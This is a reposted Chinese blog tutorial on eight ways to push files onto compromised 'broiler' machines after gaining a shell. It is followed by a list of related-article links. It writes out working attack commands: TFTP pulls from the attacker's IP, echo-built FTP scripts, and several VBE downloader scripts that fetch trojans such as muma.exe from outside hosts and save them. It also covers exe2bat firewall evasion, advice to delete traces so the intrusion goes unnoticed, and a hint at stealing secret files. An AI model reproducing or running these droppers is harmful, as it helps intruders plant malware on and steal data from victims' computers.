上传文件到肉鸡的路不止一条

简介:

一、 TFTP法传输  
我 们最喜欢也是最方便的方式是用TFTP!这里要配合TFTP32这个小型的文件传输服务器,TFTP协议使用的是UDP69端口,在我们得到肉机的 SHELL后可以很方便的传输文件到肉机上的!下面看我详细的讲解和操作,在我们得到的SHELL里输入tftp –I IP get/put xx.exe就OK了,注意这里一定要记得带上参数-I,不然是不会成功的,还有要注意的是PUT是把肉鸡上的文件传到我们自己的机子上,一般常用来偷秘 密文件(怎么像做贼似的);GET是从我们的机子上取文件到肉鸡上,也就是上传文件到肉鸡上,我们这里要用的是GET这个动作,因为我的IP是 218.XXX.XXX.7,所以我就在得到的SHELL里输入tftp –I 218.XXX.XXX.7 get nc.exe就是到我们的机子上取NC这个我们要上传的文件,可以是任何你想传的东西,但是最好传的文件比较小,否则容易失败.  
别急着敲回 车,我们还要在我们自己的机子上架好TFTP32这个软件才行,这里有个技巧,我们可以把TFTP32这个软件和我们的NC放在一个目录下,这样在取文件 时就不用另外写路径了,很是方便,我们把TFTP32放在NC一个目录里打开后它就在69端口监听看有没有需要传送文件的请求,这时我们就在得到的 SHELL里写好的那句话后敲回车就好了,怎么知道传问了没呢?我们可以看到在SHELL里有显示的,看下图4-12:  

看到上面的提示就说明传完了 ,我们也可以看看本机上的TFTP32的窗口,如下图示也说明传完了!  
     

OK,我们已经把NC传到我们的目标机上了。看下有没有呢?用DIR命令看下当前目录下有个文件叫NC就说明文件确实传上去了。如下图:  


二、 Recton程序种植者直接种植  
Recton程序种植者又种方法可以用,一个是依赖IPC的,一个则是通过写VBE来用HTTP法下载的,分别叙述如下:  
1、IPC上传  
IPC 上传方式只依赖远程主机开放IPC$和目录共享,不依赖 Task Scheduler服务。具体情况参考下图,远程主机写上对方的IP地址;用户名就是你具备管理员权限的帐号;密码就是你那个帐号的密码;选则IPC上 传,在本地选好要上传的文件,最后写上启动参数就OK了!  


2、Http法上传  
Http下载不需要远程主机开任何共享,也不依赖Task Scheduler服务。其原理是在远程主机上写入、执行一个能从 web上下载文件的VBS脚本。需要注意的是文件地址和启动参数一定要写正确,否则无法执行!文件地址一定要包含http://,如下偶写好的一个例子,运行后就会下载http://iceskys..e2u.cc/muma.exe并且运行。  


三、EXE2BAT的超级应用  
本例是使用一个名为exe2bat的小工具,在本地打开一个CMD,切换到exe2bat所在目录,输入:exe2bat.exe后回车,查看程序的使用方法,如下图:  

从 图中我们可以看到,exe2bat可以将一个应用程序(.exe)转换为一个批处理文件(.bat),而批处理文件我们是可以编辑的,下面我们就将一个开 3389的小工具3389.exe转换为批处理文件。输入:exe2bat.exe 3389.exe 3389.bat,回车后就可以得到一个名为3389.bat批处理文件。  

好了,我们用记事本打开生成的批处理文件,然后点击“编辑”菜单中的“全选”和“复制”命令,将文件中的源代码除了最后2行(如图)外全部复制到剪贴板中。  

再切换到我们得到的SHELL窗口里,点击右键选择“粘贴”命令把我们刚才复制的字符都粘贴进去,你会看到代码飞速变换,像黑客帝国里的镜头,很过瘾模∪缦峦? 

代 码复制完成后,输入:ren tvisGRAY 3389.exe命令就可以把3389.exe还原,现在你的这个文件就传上去了。这种方法的优点是不言而喻,因为它可以直接利用已经得到的shell将 文件以“代码”的形式输入到对方电脑,不需要任何网络工具的支持,同样也不必打开任何的端口,也没有任何进程,能穿越任何防火墙。不过这种方法也有一个明 显的缺点,就是上传的程序体积不能太大,不然代码的上传时间太久不说,再还原成源程序的时候也可能出现问题。


           四、FTP法传输  
           有的时候我们自己的计算机没有公网IP地址,这个时候想用TFTO就比较麻烦了,如果你嫌上面的办法比较麻烦的话,那你还可以用这个比较简单的办法就是用 FTP,但是我们在得到的SHELL里不能直接登陆我们的FTP服务器去下载东西,这涉及到一些FTP协议的问题,在这里就不详述了,我们只是讨论怎么传 文件嘛!当我们不能直接传的时候我们可以换个办法来实现,这个办法就是写个ftp.txt的文件来向FTP服务器提交就可以了。在我们得到的肉鸡的 SHELL里写入以下代码:  
           echo ftp >ftp.txt  
           echo open服务器ip [端口]>>ftp.txt  
           echo username>>ftp.txt  
           echo password>>ftp.txt  
           echo get sample.exe>>ftp.txt  
           echo bye>>ftp.txt  
           其中服务器ip就是你放你想传的文件的FTP的服务器 IP地址;username就是你登陆你的FTP的帐号;password就是你的密码;sample.exe就是你想下载的程序名字。最后一个bye是 退出FTP服务器。如下图是我做的一个示范:  
           
           其中218.XXX.XX.163 就是我的FTP服务器的IP地址,iceskysl就是我的用户名,653917就是我的密码;mt.exe就是我想下载的文件。我们DIR下看看写成功这个ftp.txt么?看上图显示我们写好了!  
           为了确保我们没有写错,最好还是用TYPE命令来看看这个 FTP.TXT文件的内容是不是我们想写进去的,一般来说是不会错的!如下图显示;接着执行ftp -s:ftp.txt 就可以下载到们的那个文件了,我这里下载的就是MT.exe这个文件,如下图显示的就是我成功下载的提示了。  
           
           
           记得最后要用del ftp.txt来删掉我们写的这个TXT文件,要不被发现了我们就亏大了!现在这个文件就传上去了,接着怎么做就不要我教你了吧!  
           
           五、利用xiazai.vbe法  
           这个方法也是很简单有效的,我们在得到的肉鸡SHELL里依次写入下面这些命令来创建一个VBE文件,代码如下:  
           echo with wscript:if .arguments.count^<2 then .quit:end if >xiazai.vbe  
           echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>xiazai.vbe  
           echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>xiazai.vbe  
           echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>xiazai.vbe  
           这样就会在肉鸡中生成一个xiazai.vbe的文件,如下图是我演示的一个结果显示,我们通过DIR可以看到这个xiazai.vbe文件已经成功创建了。  
           
           
           现在我们只要输入cscript xianzai.vbe http://iceskysl.e2u.cc/server.exe   mtt.exe就可以把http://iceskysl.e2u.cc/server.exe这个地址下的这个server.exe下载到肉鸡中并且改名字为mtt.exe,目的达到,接着怎么做,我就不多说了!  
           
           六、利用iget.vbe法  
           这个方法同上面的那个差不多,只是写法不一样,具体的还是在肉鸡SHELL中写入下面的代码:  
           echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe  
           echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe  
           echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe  
           echo xPost.Open "GET",iRemote,0 >>iget.vbe  
           echo xPost.Send() >>iget.vbe  
           echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe  
           echo sGet.Mode = 3 >>iget.vbe  
           echo sGet.Type = 1 >>iget.vbe  
           echo sGet.Open() >>iget.vbe  
           echo sGet.Write(xPost.responseBody) >>iget.vbe  
           echo sGet.SaveToFile iLocal,2 >>iget.vbe  
           这样写好后就可以这样执行了cscript iget.vbe http://icesky.com/muma.exe mm.exe 就可以把http://icesky.com/muma.exe这个地址的程序muma.exe下载下来并且改名字为mm.exe。和前面的执行差不多就不抓图了!  
           
           七、利用Http网站vbe法  
           这个就是我们前面讲的那个Recton程序种植者所用的HTTP法下载的原理,我们在得到的肉鸡的SHELL里依次写入下面这些:  
           echo Set xPost = CreateObject("Microsoft.XMLHTTP") >dsa.vbe  
           echo xPost.Open "GET","http://***.*/sample.exe",0 >>dsa.vbe  
           echo xPost.Send() >>dsa.vbe  
           echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe  
           echo sGet.Mode = 3 >>dsa.vbe  
           echo sGet.Type = 1 >>dsa.vbe  
           echo sGet.Open() >>dsa.vbe  
           echo sGet.Write(xPost.responseBody) >>dsa.vbe  
           echo sGet.SaveToFile "sample.exe",2 >>dsa.vbe  
           写好后执行:cscript dsa.vbe 就可以把你上面的那个地址("http://***.*/sample.exe,注意要换成你自己放程序的地址)下的文件下载下来了,最后同样别忘记了用del dsa.vbe删掉我们刚才写的那个文件哦!  
           
           八、 3389法  
           如果你得到的主机是可以开3389的,那就更加好办了,我们有很多的办法开3389,(这个到底怎么开就不在这个专题之内了,你可以查阅相关资料或者写次 再写这个专题的内容)你就可以开了他的3389,再自己加个帐号,然后登陆,在它的3389桌面环境下进行“本地”下载,该方法还有个好处就是对服务器上 传很严格的机器特有效。(包括硬件防火墙)



本文转自gaodi2002 51CTO博客,原文链接:http://blog.51cto.com/gaodi2002/1618188
相关文章
|
6月前
|
网络协议
ftp文件上传缓慢问题
ftp文件上传缓慢问题
|
10月前
|
Shell
从FTP服务器下载文件
从FTP服务器下载文件
68 0
|
11月前
|
开发框架 安全 前端开发
|
11月前
|
Web App开发 安全 前端开发
干货 | 总结各种骚姿势绕过文件上传
干货 | 总结各种骚姿势绕过文件上传
12223 0
|
11月前
|
安全 PHP 数据安全/隐私保护
记一次webshell文件及流量免杀
记一次webshell文件及流量免杀
235 0
|
安全 JavaScript 前端开发
网站总是被上传漏洞上传了木马后门被入侵怎么办
SINE安全又带上业务逻辑漏洞来跟大家做分享了,这一次的主题内容是上传文件漏洞。许许多多企业网站都准许客户自己图片上传、电子版资料,假如上传功能并没有搞好安全防护对策,就存有极大的安全隐患。假如网站应用领域在上传文件流程中并没有对文档的安全性能采取合理的校检,攻击者能够根据上传webshell等恶意文档对php服务器攻击,这样的情况下指出操作系统存有上传文件漏洞。下列是我汇总的一小部分上传漏洞的情景,假如你拥有掌握其他上传避过姿势还可以和我们讨论讨论。
180 0
网站总是被上传漏洞上传了木马后门被入侵怎么办
|
SQL 监控 安全
网站服务器被攻击了如何查找木马(webshell)IP 篡改的痕迹
很对客户网站以及服务器被攻击,被黑后,留下了很多webshell文件,也叫网站木马文件,客户对自己网站的安全也是很担忧,担心网站后期会继续被攻击篡改,毕竟没有专业的安全技术去负责网站的安全防护工作,通过老客户的介绍很多客户在遇到网站被攻击后找到我们SINE安全做网站的安全服务,防止恶意攻击与篡改。对网站进行全面的防御与加固,我们在对客户网站进行安全部署的同时,客户经常会想要了解到底网站,以及服务器是如何被入侵,攻击者的IP是谁,那么我们SINESAFE技术针对这种情况,最好的办法就是通过日志进行分析,溯源追踪,帮助客户找到网站漏洞根源,到底是谁在攻击他们。下面我们来分享一下,我们是如何对日志进
545 0
网站服务器被攻击了如何查找木马(webshell)IP 篡改的痕迹
|
监控 安全 程序员
服务器里如何查杀网站后门文件
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。
3832 0
|
安全 数据安全/隐私保护